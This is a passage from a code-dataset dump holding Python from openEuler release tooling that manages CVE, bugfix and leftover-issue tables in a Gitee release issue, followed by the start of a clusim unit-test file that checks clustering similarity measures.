if not isinstance(t_head, (list, tuple)):
raise ValueError("The thead must be a list or tuple.")
thead_str = "|" + "|".join(t_head) + "|\n" + "|-" * len(t_head) + "|\n"
tbody_str = self.convert_md_table_format(t_head, body_info)
table_str = thead_str + tbody_str
if prefix:
table_str = prefix + "\n" + table_str
return "\n".join([block_title, table_str, suffix])
@staticmethod
def convert_md_table_format(table_head, issue_info):
"""
get markdown table body according to table_head and issue_info
Args:
table_head: table head like ["issue","status",...]
issue_info: issue info like [{"issue":...,"status":...},....]
Returns:
markdown table str
"""
if not issue_info:
issue_info = []
table_body_str = ""
for info in issue_info:
table_body_str += "|"
for word in table_head:
table_body_str += str(info.get(word)) + "|"
table_body_str += "\n"
return table_body_str
@staticmethod
def get_block_lines(issue_body_lines, start_flag, end_flag):
"""
get block lines of specific part from issue body lines
Args:
issue_body_lines: the lines of issue body
start_flag: start flag of specific part, like ""## 1、CVE""
end_flag: end flag of specific part, like "\n"
Returns: block_lines: lines in specific part like "cve part"
block_start_idx: start index of specific part
block_end_idx: end index of specific part
"""
block_start_idx = 0
block_end_idx = 0
flag = 0
# get block lines
for idx, line in enumerate(issue_body_lines):
if not flag and line.startswith(start_flag):
# represents the start of block
flag = 1
block_start_idx = idx
continue
if flag and line == end_flag:
block_end_idx = idx
break
return issue_body_lines[block_start_idx:block_end_idx], block_start_idx, block_end_idx
@staticmethod
def modify_block_lines(origin_lines, block_lines, block_start, block_end):
"""
modify block lines for add or delete operation
Args:
origin_lines: list, issue body splitlines
block_lines: list, block str splitlines
block_start: start index of block
block_end: end index of block
Returns:
new lines for issue body, list
"""
# to get count and then modify str "修复CVE xxx个"
fix_line_idx = -1
count = 0
for index, cur_line in enumerate(block_lines):
# demo: 修复CVE xxx个
if cur_line.startswith("修复"):
fix_line_idx = index
# demo: |#I41R53:CVE-2021-36222|krb5|
if cur_line.startswith("|#"):
count += 1
if fix_line_idx != -1:
block_lines[fix_line_idx] = re.sub(
"\d+", str(count), block_lines[fix_line_idx]
)
# modify block lines
origin_lines[block_start:block_end] = block_lines
return origin_lines
@staticmethod
def __append_info_in_specific_block(append_info, block_lines):
"""
append info in specific block for add operation
Args:
append_info: issue info or requires info, dict
block_lines: lines of specific block
Returns:
block_lines: block lines after append
"""
for key, value in append_info.items():
# if the issue to be added is already in the table, then continue
if any([key in line for line in block_lines]):
logger.info("issue {} already exists in body content.".format(key))
continue
# if the requires info to be added already in the table, then not add
value_lines = value.splitlines(keepends=True)
append_value_lines = []
for line in value_lines:
if line not in block_lines:
append_value_lines.append(line)
value = "".join(append_value_lines)
block_lines.append(value)
return block_lines
@staticmethod
def __delete_issue_in_specific_block(delete_issue, block_lines):
"""
delete issue in specific block for delete operation
Args:
block_lines: lines of specific block
delete_issue: issue to delete
Returns:
block_lines: block lines after delete
"""
to_remove_idx = -1
for idx, block_line in enumerate(block_lines):
if delete_issue in block_line:
to_remove_idx = idx
break
if to_remove_idx != -1:
block_lines.pop(to_remove_idx)
else:
logger.info("The issue {} does not exist in release issue description."
"".format(delete_issue))
return block_lines
@staticmethod
def __update_info_in_specific_block(update_info, block_lines):
"""
update info in specific block for update operation
Args:
update_info: issue to update
block_lines: lines of specific block
Returns:
block_lines: new lines of specific block
"""
for issue_id, issue_content in update_info.items():
if not issue_content:
continue
for idx, ln in enumerate(block_lines):
if issue_id in ln:
block_lines[idx] = issue_content
break
return block_lines
def get_new_body_lines(self, old_issue_info, append_info=None, delete_info=None,
update_info=None, start_flag="", end_flag="\n"):
"""
generating a new issue body by add or delete or update operation
Args:
old_issue_info: old issue info
append_info: issues to add. like {issue_id:{"repo":..,"status":...},...}
delete_info: issues to delete.
update_info: issues to update.
start_flag: start flag of block
end_flag: end flag of block.
Raises:
ValueError:
append_info、 delete_info need at least one
Returns:
new body lines
"""
if not any((append_info, delete_info, update_info)):
raise ValueError("append_info or delete_info or update info need at least one")
issue_body_lines = old_issue_info.splitlines(keepends=True)
block_lines, block_start_idx, block_end_idx = self.get_block_lines(
issue_body_lines, start_flag, end_flag)
if append_info:
block_lines = self.__append_info_in_specific_block(append_info, block_lines)
elif delete_info:
block_lines = self.__delete_issue_in_specific_block(delete_info, block_lines)
else:
block_lines = self.__update_info_in_specific_block(update_info, block_lines)
final_lines = self.modify_block_lines(issue_body_lines, block_lines, block_start_idx,
block_end_idx)
return "".join(final_lines)
def create_jenkins_comment(self, jenkins_result):
"""method to create issue comment
Args:
jenkins_result: jenkins result
Returns:
comment_res: Success and failure in creating a comment
"""
for result in jenkins_result:
if not result.get("status"):
logger.error("failed to obtain jenkins_result")
return
th = ["name", "status", "output"]
comment = self.init_md_table(th, jenkins_result)
comment_res = self.create_issue_comment(comment)
if not comment_res:
logger.error("Failed to create Jenkins' comment message %s" % comment)
return
return comment_res
def add_for_specific_block(self, body_str, issues, table_head, block_name):
"""
add info in specific block
Args:
body_str: str, issue body
issues: issues to be add
table_head: list, table head
block_name: block name
Returns:
processed issue body str
"""
if not body_str:
raise ValueError("no content of release issue body, failed to add.")
issues_dict = dict()
issues_info_list = list()
# If the block is "requires", then get the md format str directly, like "|bluez|接口变更|"
if "requires" in block_name:
requires_md_str = self.convert_md_table_format(table_head, issues)
if requires_md_str:
issues_info_list.append(requires_md_str)
issues_dict = {"requires_str": requires_md_str}
else:
# for other blocks, get detail issue info according to each issue id, then get the md format str
# like "|#I41R53:CVE-2021-36222|krb5|已完成|7.5|1.18.2|否|"
for issue_id in issues:
single_issue_info = self.get_single_issue_info(issue_id, block_name)
if single_issue_info:
issues_info_list.append(single_issue_info)
issue_info = self.convert_md_table_format(table_head, single_issue_info)
issues_dict.setdefault(issue_id, issue_info)
# if all the info to be add are empty
if not issues_info_list:
raise ValueError("failed to add, please check whether the issues to be added exists.")
return self.get_new_body_lines(
body_str, append_info=issues_dict, start_flag=block_name, end_flag="\n"
)
def delete_for_specific_block(self, body_str, issues, block_name):
"""
delete info in specific block
Args:
body_str: str, issue body
issues: issues to be delete
block_name:block name
Returns:
processed issue body str
"""
if not body_str:
raise ValueError("no content of release issue body, failed to delete.")
res_str = body_str
# delete each issue and then get new issue body lines
for issue_id in issues:
res_str = self.get_new_body_lines(
res_str, delete_info=issue_id, start_flag=block_name, end_flag="\n"
)
return res_str
@staticmethod
def __get_score(body_str):
"""
get the score of cve
Args:
body_str: cve issue body str
Returns:
str: score value or no score
"""
# to match openEuler评分 for cve
euler_score_pattern = re.compile("openEuler评分.*?(?P<euler_score>[0-9\.]+)", flags=re.S)
euler_res = euler_score_pattern.search(body_str)
if euler_res:
return euler_res["euler_score"]
else:
# to match BaseScore for cve
base_score_pattern = re.compile("BaseScore[::](?P<base_score>[0-9\.]+)")
base_score = base_score_pattern.search(body_str)
return base_score["base_score"] if base_score else "no score info"
def __is_abi_change(self, body_str):
"""
Parsing whether the abi has changed
Args:
body_str: cve issue body
Returns:
"是" or "否"
"""
# to match whether the abi has changed of specific branch
abi_content_pattern = re.compile("修复是否涉及abi变化.*?(?P<abi>.*)[\\n$]", flags=re.S)
abi_res = abi_content_pattern.search(body_str)
if not abi_res:
logger.error("The abi pattern did not match the info")
return "否"
abi_info = abi_res["abi"]
branch = self.get_update_issue_branch()
if not branch:
return "否"
for line in abi_info.splitlines():
if branch in line and "是" in line:
return "是"
return "否"
def get_single_issue_info(self, issue_id, block_name):
"""
get singe issue info for specific block
Args:
block_name: name of block
issue_id: issue id
Returns:
list: issue info list
"""
issue_content = self.get_issue_info(issue_number=issue_id)
if not issue_content:
logger.error("can not get the content of issue {}, perhaps this issue does not exist.".format(issue_id))
return []
repository = issue_content.get("repository", {})
# for all the block, get the dict of repository and status for the issue
issue_info = {
"仓库": repository.get("name", "无仓库信息"),
"status": issue_content.get("issue_state", "无状态信息")
}
block_names_list = ["## 2、bugfix", "# 3、安装、自编译问题", "# 4、遗留问题"]
if block_name in block_names_list:
issue_info["issue"] = "#" + issue_id
if "遗留" in block_name:
issue_info["type"] = issue_content.get("issue_type", "无type信息")
issue_info["status"] = "遗留"
elif "CVE" in block_name:
issue_body = self.get_issue_body(issue_id)
if not issue_body:
logger.error("empty issue body for {}, can not get the info for {} block.".format(issue_id, block_name))
return []
version_pattern = re.compile("漏洞归属的版本[::](?P<version>.*)")
version = version_pattern.search(issue_body)
issue_info["CVE"] = "#" + issue_id
issue_info["score"] = self.__get_score(issue_body)
issue_info["version"] = version["version"] if version else "no version info"
issue_info["abi是否变化"] = self.__is_abi_change(issue_body)
return [issue_info]
def update_for_specific_block(self, body_str, issues, table_head, block_name):
"""
Update specific table modules
Args:
body_str: body info
issues: list of issue numbers
table_head: table head
block_name: block name
Returns:
get_new_body_lines: The new issue of body
"""
if not body_str:
raise ValueError("no content of release issue, failed to update")
to_update = {}
for issue_id in issues:
# latest issue status
single_issue_info = self.get_single_issue_info(issue_id, block_name)
to_update.setdefault(
issue_id, self.convert_md_table_format(table_head, single_issue_info)
)
return self.get_new_body_lines(
body_str, update_info=to_update, start_flag=block_name, end_flag="\n"
)
def operate_for_specific_block(self, table_head, block_name, table_body=None, prefix="", operate="init",
body_str=None, issues=None):
"""
Process init, add, delete operations for specific block
Args:
table_head: list, table head
block_name: str, block name like ""## 1、CVE""
table_body: table_body of specific part for init, like [{..},{..},..].
prefix: prefix of block, like "修复了bugfix xxx个"
operate: init, add, delete
body_str: issue body, str
issues: issue id, list
Raises:
ValueError: not allowed operate
Returns:
processed release issue body str
"""
if not table_body:
table_body = []
if operate == "init":
return self.init_md_table(table_head, table_body, block_name, prefix)
elif operate == "add":
return self.add_for_specific_block(body_str, issues, table_head, block_name)
elif operate == "delete":
return self.delete_for_specific_block(body_str, issues, block_name)
elif operate == "update":
return self.update_for_specific_block(body_str, issues, table_head, block_name)
else:
raise ValueError(
"not allowed 'operate' value,expected in ['init','add','delete','update'],but given {}".format(operate)
)
def init(self, *args):
"""
init specific block
Returns:
init str
"""
return self.get_new_issue_body(operate="init", *args)
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
raise NotImplementedError
class CveIssue(Operation):
"""
operation CVE in issue
"""
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
def create_cve_list(self, user_email):
"""
The CVE-Manager is triggered to generate the CVE list and archive it
Args:
user_email (str): gitee user email
"""
# Take cve within three months
start_time = (datetime.datetime.now() + datetime.timedelta(days=-90)).strftime('%Y-%m-%d')
email_name = user_email.split('@')[0]
url = "https://api.openeuler.org/cve-manager/v1/download/excel/triggerCveData?startTime=" + \
start_time + "&typeName=" + email_name
try:
response = requests.get(url, headers=self.headers)
if response.status_code == 200 and "a task being processed" in response.text:
logger.info("The CVE-Manager is triggered to generate the CVE list and archive the CVE list")
return True
logger.error("The CVE List file fails to be archived,"
"The response status code is %s,"
"the response body is %s" % (response.status_code, response.text))
return False
except (requests.RequestException, AttributeError) as error:
logger.error("The CVE List file fails to be archived because %s " % error)
return False
def get_cve_list(self, *args):
"""
Obtain cVE-related information provided by the CVE-Manager.
Returns:
cve_list: Data in Excel in dictionary form
"""
user_email, obs_ak, obs_sk = args
# trigger cve_manger to archive
resp = self.create_cve_list(user_email)
if not resp:
raise ValueError("trigger cve-manege archive failure")
@retry(stop_max_attempt_number=5, wait_fixed=60000)
def get_list():
"""
Get archived files
Returns:
cve_list: document content
"""
now_time = datetime.date(
datetime.date.today().year,
datetime.date.today().month,
datetime.date.today().day,
).strftime("%Y-%m-%d")
branch_name = self.get_update_issue_branch()
if not branch_name:
logger.error("Failed to obtain branch")
return []
cve_list = download_file(
now_time, "{}_updateinfo.xlsx".format(branch_name), obs_ak, obs_sk
)
if not cve_list:
logger.error("Failed to obtain CVE data")
raise ValueError("Failed to obtain CVE data")
return cve_list
cve_list = get_list()
return cve_list
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for cve block operation
Args:
operate: operate str. Defaults to "init".expected [init,add,delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
new issue body str
"""
if not issues:
issues = []
t_head = ["CVE", "仓库", "status", "score", "version", "abi是否变化"]
block_name = "## 1、CVE"
logger.info("Start to obtain cve archive information, it may take a few minutes.")
cve_list = [] if operate != "init" else self.get_cve_list(*args)
cve_prefix = "修复CVE {}个".format(len(cve_list))
return self.operate_for_specific_block(t_head, block_name, prefix=cve_prefix, operate=operate,
table_body=cve_list, body_str=body_str, issues=issues)
class BugFixIssue(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for bugfix block operation
Args:
operate: operate str. Defaults to "init".expected [init,add,delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
str: new issue body str
"""
if not issues:
issues = []
table_head = ["issue", "仓库", "status"]
block_name = "## 2、bugfix"
bugfix_list = []
bugfix_prefix = "修复bugfix {}个".format(len(bugfix_list))
return self.operate_for_specific_block(
table_head,
block_name,
prefix=bugfix_prefix,
operate=operate,
table_body=bugfix_list,
body_str=body_str,
issues=issues,
)
class RequiresIssue(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
@staticmethod
def get_requires_list():
"""
get requires list
Returns:
requires list, like [{"仓库":..., "引入原因":...},...]
"""
# since the code that generates pkg requires is not in the repository,
# so it is assumed that the return value is []
return []
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for requires block operation
Args:
operate. Defaults to "init".expected [init,add,delete]
body_str: gitee issue body str.
issues: issue list
Returns:
new issue body str
"""
t_head = ["仓库", "引入原因"]
block_name = "## 3、requires"
if operate not in ["init", "add"]:
raise ValueError("requires block operation only allowed in ['init', 'add'].")
issues = self.get_requires_list()
return self.operate_for_specific_block(
t_head, block_name, operate=operate, body_str=body_str, issues=issues
)
class InstallBuildIssue(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for install build block operation
Args:
operate: operate str. expected [init,add,delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
new issue body str
"""
table_head = ["issue", "仓库", "status"]
block_name = "# 3、安装、自编译问题"
return self.operate_for_specific_block(
table_head,
block_name,
operate=operate,
body_str=body_str,
issues=issues
)
class RemainIssue(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for remain block operation
Args:
operate: operate str. expected [init,add,delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
str: new issue body str
"""
t_header = ["issue", "仓库", "status", "type"]
block_name = "# 4、遗留问题"
return self.operate_for_specific_block(
t_header,
block_name,
operate=operate,
body_str=body_str,
issues=issues
)
class IssueOperation(Operation):
def __init__(self, repo, token, issue_num):
super().__init__(repo, token, issue_num)
args = (repo, token, issue_num)
self.cve_object = CveIssue(*args)
self.bugfix_object = BugFixIssue(*args)
self.requires_object = RequiresIssue(*args)
self.install_build_object = InstallBuildIssue(*args)
self.remain_object = RemainIssue(*args)
def init_repo_table(self):
"""
init repo table
return:
md table str
"""
block_name = "# 2、测试repo源"
table_head = ["repo_type", "url"]
table_str = self.init_md_table(table_head)
return block_name + table_str
def create_install_build_issue(self, failed_type, pkg_name, log_data):
"""
create issue when install failed or build failed
Args:
failed_type: install failed or build failed
pkg_name: package name
log_data: Compilation log information
return:
issue_id
"""
branch = self.get_update_issue_branch()
if not branch:
logger.error("failed to create install build issue because the release issue branch not found.")
return None
release_time = self.get_release_time()
if not release_time:
logger.error("failed to create install build issue because the release time not found.")
return None
params = {
"repo": pkg_name,
"owner": self.owner,
"access_token": self.token,
"title": "[{brh}] {pkg} {verify_type} failed {release_date}".format(pkg=pkg_name, verify_type=failed_type,
brh=branch, release_date=release_time)
}
command = ""
if failed_type == "build":
command = "rpmbuild --rebuild"
elif failed_type == "install":
command = "yum install"
params["body"] = """Branch: {brh}
Component: {pkg}
Instructions to reappear the problem : {command}
Expected results: successfully {_type}
Actual results: failed to {_type}
<b>Partial failure log:</b>
<P>
{log_data}
""".format(brh=branch, pkg=pkg_name, command=command,
_type=failed_type, log_data=log_data)
issue_id = self.create_issue(params)
return issue_id
def get_update_version_info(self):
"""
Get update target and personnel information
Returns:
update version info
"""
issue_body = self.get_issue_body(self.issue_num)
if issue_body:
if re.compile("1、CVE.*?\\n\\n", re.S).search(issue_body):
logger.error("Issue has CVE content, maybe you already have operated start update command.")
return None
if "代码冻结" not in issue_body:
logger.error("the code freeze time is not in release issue body.")
return None
if not issue_body.endswith("\n"):
issue_body += "\n"
return issue_body
return None
def get_release_time(self):
"""
get the date for release
Returns:
release_date
"""
issue_body = self.get_issue_body(self.issue_num)
if not issue_body:
logger.error("no content of release issue body.")
return None
date_info = re.compile("(?P<release_date>代码冻结.*?\\n\\n)", re.S).search(issue_body)
if not date_info:
logger.error("the code freeze time is not in release issue body.")
return None
split_date_info = re.split(r":|:", date_info["release_date"].strip())
try:
release_date = split_date_info[1].strip()
# The length of the date including year, month, and day is 8
if release_date.isdigit() and len(release_date) == 8:
return release_date
logger.error("The format of the code freeze date: %s does not meet the requirements." % release_date)
return None
except IndexError:
logger.error("error in getting code freeze date.")
return None
def get_repo(self, md_type=True):
"""
get repo according to branch 、date and epol
"""
branch = self.get_update_issue_branch()
if not branch:
raise ValueError("can not get the branch, please check.")
release_date = self.get_release_time()
if not release_date:
raise ValueError("can not get the release time, please check.")
base_url = REPO_BASE_URL + branch
repos = []
repo_dict = {
"repo_type": "standard",
"url": base_url + "/update_" + release_date + "/"
}
repos.append(repo_dict)
pkglist = self.get_update_list()
_, epol_list = self.get_standard_epol_list(branch, pkglist)
if epol_list:
repo_dict = dict()
repo_dict["repo_type"] = "epol"
if "sp2" in branch or "SP2" in branch:
repo_dict["url"] = base_url + "/EPOL/update_" + release_date + "/main/"
else:
repo_dict["url"] = base_url + "/EPOL/update_" + release_date + "/"
repos.append(repo_dict)
if md_type:
t_header = ["repo_type", "url"]
block_name = "# 2、测试repo源"
return self.init_md_table(t_head=t_header, body_info=repos, block_title=block_name)
return repos
@staticmethod
def _process_issue_id(body):
"""
Process the MD string to get the issue ID
Args:
body (str): block body
Returns:
set: current block repos
"""
content = re.compile("#[a-zA-Z0-9]+", re.S).findall(body)
if not content:
return content
return [con.replace("#", "") for con in content]
def _get_install_build_bugfix_issue_id(self, issue_body):
"""
Gets the corresponding block element with regular,
Args
issue_body: issue body str
Returns:
issue number: issue number list
"""
def update_set(res_obj):
# Call the _process_issue_id function to return the issue number
res_set = set()
issue_list = self._process_issue_id(res_obj)
res_set.update(issue_list)
return res_set
def update_res(issue_res, choice):
# If this table object exists,
# the final issue is fetched based on the selection
issues = set()
if issue_res:
issues = update_set(issue_res[choice])
return issues
# Installs the compiled table information object
install_build_res = re.compile("(?P<install_build>3、安装、自编译问题.*?\\n\\n)",
re.S).search(issue_body)
# Table information object for bugfix
bugfix_res = re.compile("(?P<bugfix>2、bugfix.*?\\n\\n)", re.S).search(issue_body)
# cve table information object
cve_res = re.compile("(?P<cve>1、CVE.*?\\n\\n)", re.S).search(issue_body)
install_build_issues = update_res(install_build_res, "install_build")
bugfix_issues = update_res(bugfix_res, "bugfix")
cve_issues = update_res(cve_res, "cve")
if not all([install_build_issues, bugfix_issues, cve_issues]):
logger.info("Block has no related issues install_build_issues:%s, "
"bugfix_issues: %s,cve_issues: %s " % (install_build_issues, bugfix_issues, cve_issues))
return list(install_build_issues), list(bugfix_issues), list(cve_issues)
def update_remain_issue_state(self, issue_list, action):
"""
Change the issue in bugfix and cve according to
whether the command is left
Args:
issue_list: issues
action: add or delete
Returns:
True or False
"""
try:
if action not in ["add", "delete"]:
raise ValueError("action parameter errors must be in add and delete")
issue_body = self.get_issue_body(self.issue_num)
if not issue_body:
raise ValueError("failed to obtain the issue description")
_, bugfix_issues, cve_issue = self._get_install_build_bugfix_issue_id(issue_body)
to_update = {}
not_exist_issues = []
for issue in issue_list:
if issue not in bugfix_issues and issue not in cve_issue:
not_exist_issues.append(issue)
logger.warning("issue %s not exist in cve and bugfix part" % issue)
continue
if issue in bugfix_issues:
t_head = ["issue", "仓库", "status"]
operate_ins = getattr(self, "bugfix" + "_object")
block_name = '## 2、bugfix'
new_con = operate_ins.get_single_issue_info(issue, block_name)[0]
else:
t_head = ["CVE", "仓库", "status", "score", "version", "abi是否变化"]
operate_ins = getattr(self, "cve" + "_object")
block_name = '## 1、CVE'
new_con = operate_ins.get_single_issue_info(issue, block_name)[0]
if action == "add":
new_con["status"] = "遗留"
to_update.setdefault(
issue, self.convert_md_table_format(t_head, [new_con])
)
body_str = self.get_new_body_lines(
issue_body, update_info=to_update, start_flag=block_name, end_flag="\n"
)
res = self.update_issue(body=body_str)
if not res:
raise ValueError("failed to %s action issue status,issue is %s" % (action, issue))
except (ValueError, AttributeError, IndexError, TypeError, KeyError) as error:
logger.error("In the %s operation, the reasons for the error are as follows: %s" % (action, error))
return False
if issue_list == not_exist_issues:
return False
return True
def get_remain_issues(self):
"""
get issues in remain block
Returns:
remain issues
"""
issue_body = self.get_issue_body(self.issue_num)
if not issue_body:
logger.error("empty body of release issue.")
return []
remain_res = re.compile("(?P<remain>4、遗留问题.*?\\n\\n)", re.S).search(issue_body)
if not remain_res:
logger.error("can not find remain issues label in release issue.")
return []
remain_issues = self._process_issue_id(remain_res["remain"])
if not remain_issues:
logger.info("can not find any remain issues in release issue.")
return list(set(remain_issues))
def get_remain_packages(self):
"""
get packages in remain block
Returns:
remain package list
"""
remain_issues = self.get_remain_issues()
remain_pkgs = []
for issue_number in remain_issues:
issue_content = self.get_issue_info(issue_number=issue_number)
if not issue_content:
logger.error("can not get the content of issue %s, perhaps this issue not exist." % issue_number)
continue
repository = issue_content.get("repository", {})
if repository.get("name"):
remain_pkgs.append(repository.get("name"))
return list(set(remain_pkgs))
def check_issue_state(self):
"""
Check the issue status under the bugfix and install_build headers
Returns:
True: update the status of the issue to the latest status successfully
False: failed to update the status of the issue to the latest status
"""
try:
body = self.get_issue_body(self.issue_num)
if not body:
raise ValueError("failed to get issue description information")
# get the bugfix and the issue number under the install_build and cve table headers
install_build_issues, bugfix_issues, _ = self._get_install_build_bugfix_issue_id(body)
remain_issues = self.get_remain_issues()
if install_build_issues:
install_build_issues = [issue for issue in install_build_issues if issue not in remain_issues]
self.operate_release_issue(operation="update", operate_block="install_build",
issues=install_build_issues)
if bugfix_issues:
bugfix_issues = [issue for issue in bugfix_issues if issue not in remain_issues]
self.operate_release_issue(operation="update", operate_block="bugfix",
issues=bugfix_issues)
except (ValueError, TypeError, KeyError, AttributeError) as error:
logger.error("failed to update the status of the issue, the specific reason is %s" % error)
return False
return True
def init_issue_description(self, *args):
"""
initialize the release issue body when commenting "start-update" command
Returns:
True or False
"""
update_info = self.get_update_version_info()
if not update_info:
return False
release_range = "# 1、发布范围\n"
cve_block_str = self.cve_object.init(*args)
bugfix_block_str = self.bugfix_object.init()
requires_block_str = self.requires_object.init()
repo_block_str = self.init_repo_table()
install_build_block_str = self.install_build_object.init()
remain_block_str = self.remain_object.init()
body_str = (
update_info
+ release_range
+ cve_block_str
+ bugfix_block_str
+ requires_block_str
+ repo_block_str
+ install_build_block_str
+ remain_block_str
)
return True if self.update_issue(body=body_str) else False
def get_new_issue_body(self, *args, operate="init", body_str=None, issues=None):
"""
get new issue body for specific operation
Args:
operate: operate str. Defaults to "init".expected [init,add,delete]
body_str: gitee issue body str.
issues: issue id list.
Returns:
new issue body str
"""
old_body_str = self.get_issue_body(self.issue_num)
if not old_body_str:
logger.error("The current issue has no content, please start first.")
return False
update_block = args[0]
# get the block object, like cve block object, and then call
# "get_new_issue_body" for this block
operate_object = getattr(self, update_block + "_object")
body_str = operate_object.get_new_issue_body(
operate=operate, body_str=old_body_str, issues=issues)
return body_str
def update_issue_description(self, operate, update_block, issues=None):
"""
to update issue description
Args:
operate: operate in {add,delete}.
update_block: block name, like cve or bugfix,
issues: issue list.
returns:
True or False
"""
if not issues:
issues = []
old_body_str = self.get_issue_body(self.issue_num)
if not old_body_str:
logger.error(
"The current issue has no content, please start first.")
return False
body_str = self.get_new_issue_body(update_block, operate=operate, issues=issues)
if not body_str:
logger.error(
"after update issue description, got empty new release issue body.")
return False
return True if self.update_issue(body=body_str) else False
def count_issue_status(self):
"""
statistics of the status of all issues
Returns:
true: the status of all issue is completed
false: there is an unfinished issue
"""
try:
body = self.get_issue_body(self.issue_num)
# obtain the issue number under installation, compilation and bugfix
install_build_issues, bugfix_issues, _ = self._get_install_build_bugfix_issue_id(body)
issues = install_build_issues + bugfix_issues
unfinished_issues = []
if not issues:
logger.info("no issue in install_build and bugfix block.")
return True
# traverse all issues, get the status of the issue,
# and add the unfinished ones to the unfinished list
for issue_number in issues:
issue_content = self.get_issue_info(issue_number)
if not issue_content:
logger.error("failed to get the issue info of %s. " % issue_number)
continue
if issue_content.get("issue_state") != "已完成":
unfinished_issues.append(issue_number)
if unfinished_issues:
logger.info("The following issue status is not complete %s" % ",".join(unfinished_issues))
return False
except (ValueError, TypeError) as error:
logger.error("an error occurred while counting the status of the issue. "
"The error is %s" % error)
return False
return True
@staticmethod
def release_announcement(user_name, password):
"""
release announcement
Args:
user_name: user name
password: password
Returns:
return true on success, false on failure
"""
try:
response = requests.post(RELEASE_URL, data={"username": user_name,
"password": password})
if response.status_code == 200:
if "successfully" in json.loads(response.text):
logger.info("release announcement successfully")
return True
logger.error(response.text)
return False
logger.error("failed to request the announcement address: %s ,"
"because of the response status code is %s "
"response body is %s " % (RELEASE_URL, response.status_code, response.text))
return False
except (requests.RequestException, AttributeError, json.JSONDecodeError) as error:
logger.error("failed to request the announcement address: %s ,"
"because of %s" % (RELEASE_URL, error))
return False
def operate_release_issue(self, *args, operation="init", operate_block=None, issues=None):
"""
modify entrance of the release issue
Args:
operation: {init,add,delete}
operate_block: block to operate
when the operation is "init", operate_block=None
issues: issue list
Returns:
True or False
"""
try:
if operation == "init":
return self.init_issue_description(*args)
else:
return self.update_issue_description(
operate=operation, update_block=operate_block, issues=issues
)
except ValueError as e:
logger.error(e)
return False
| 1.820313 | 2 |
tests/sim_tests.py | yy/clusim | 2 | 12789313 | # -*- coding: utf-8 -*-
#
# Tests for ``sim.py``
# These tests were hand calculated by <NAME>: <EMAIL>
#
from clusim.clustering import Clustering
import clusim.sim as sim
from clusim.dag import DAG
import clusim.clusimelement as clusimelement
from numpy.testing import assert_approx_equal
from numpy import mean
def test_comparison_example():
c1_elm2clu_dict = {0: [0], 1: [1], 2: [1], 3: [0], 4: [2], 5: [1]}
c2_elm2clu_dict = {0: [0], 1: [1], 2: [1], 3: [0], 4: [2], 5: [2]}
c1 = Clustering(elm2clu_dict=c1_elm2clu_dict)
c2 = Clustering(elm2clu_dict=c2_elm2clu_dict)
N11, N10, N01, N00 = sim.count_pairwise_cooccurence(c1, c2)
assert N11 == 2, "Element Co-occurance counts for N11 does not match. %s != %s" % (N11, 2)
assert N10 == 2, "Element Co-occurance counts for N10 does not match. %s != %s" % (N10, 2)
assert N01 == 1, "Element Co-occurance counts for N01 does not match. %s != %s" % (N01, 1)
assert N00 == 10, "Element Co-occurance counts for N00 does not match. %s != %s" % (N00, 10)
known_sim_values = {'jaccard_index': 0.4,
'rand_index': 0.8,
'fowlkes_mallows_index': 0.5773502691896258,
'rogers_tanimoto_index': 2./3.,
'southwood_index': 2./3.,
'czekanowski_index': 0.5714285714285714,
'dice_index': 0.5714285714285714,
'sorensen_index': 0.5714285714285714,
'pearson_correlation': 0.011363636363636364,
'classification_error': 0.16666666666666674,
'purity_index': 0.8333333333333333,
'fmeasure': 0.5714285714285714,
'nmi': 0.7396673768007593,
'vi': 0.792481250360578,
'geometric_accuracy': 0.8333333333333334,
'overlap_quality': 0.0,
'onmi': 0.7449589906475155,
'omega_index': 0.44444444444444453
}
for simfunc in sim.available_similarity_measures:
simvalue = eval('sim.' + simfunc+'(c1, c2)')
assert simvalue == known_sim_values[simfunc], "Similarity Measure %s does not match. %s != %s" % (simfunc, simvalue, known_sim_values[simfunc])
def test_model_example():
c1_elm2clu_dict = {0: [0], 1: [1], 2: [1], 3: [0]}
c2_elm2clu_dict = {0: [0], 1: [1], 2: [1], 3: [1]}
c1 = Clustering(elm2clu_dict=c1_elm2clu_dict)
c2 = Clustering(elm2clu_dict=c2_elm2clu_dict)
known_rand_values = {'perm': 0.5,
'perm1': 0.5,
'num': 0.510204081632653,
'num1': 0.5,
'all': 0.555555555555556,
'all1': 0.5
}
known_mi_values = {'perm': 0.311278124459133,
'perm1': 0.311278124459133,
'num': 0.309927805548467,
'num1': 0.301825892084476,
'all': 0.611635721962606,
'all1': 0.419448541053684
}
for rdm in sim.available_random_models:
exp_rand_value = sim.expected_rand_index(n_elements=c1.n_elements,
n_clusters1=c1.n_clusters,
n_clusters2=c2.n_clusters,
clu_size_seq1=c1.clu_size_seq,
clu_size_seq2=c2.clu_size_seq,
random_model=rdm
)
assert_approx_equal(exp_rand_value, known_rand_values[rdm], 10**(-10), "Expected Rand Index with %s Random Model does not match. %s != %s" % (rdm, exp_rand_value, known_rand_values[rdm]))
exp_mi_value = sim.expected_mi(n_elements=c1.n_elements,
n_clusters1=c1.n_clusters,
n_clusters2=c2.n_clusters,
clu_size_seq1=c1.clu_size_seq,
clu_size_seq2=c2.clu_size_seq,
random_model=rdm,
logbase=2.)
assert_approx_equal(exp_mi_value, known_mi_values[rdm], 10**(-10), "Expected MI with %s Random Model does not match. %s != %s" % (rdm, exp_mi_value, known_mi_values[rdm]) )
def test_elementsim_example():
# taken from Fig 3 of Gates et al (2018) Scientific Reports
# overlapping clustering
c1_elm2clu_dict = {0: [0], 1: [0], 2: [0], 3: [1], 4: [1], 5: [1, 2], 6: [2]}
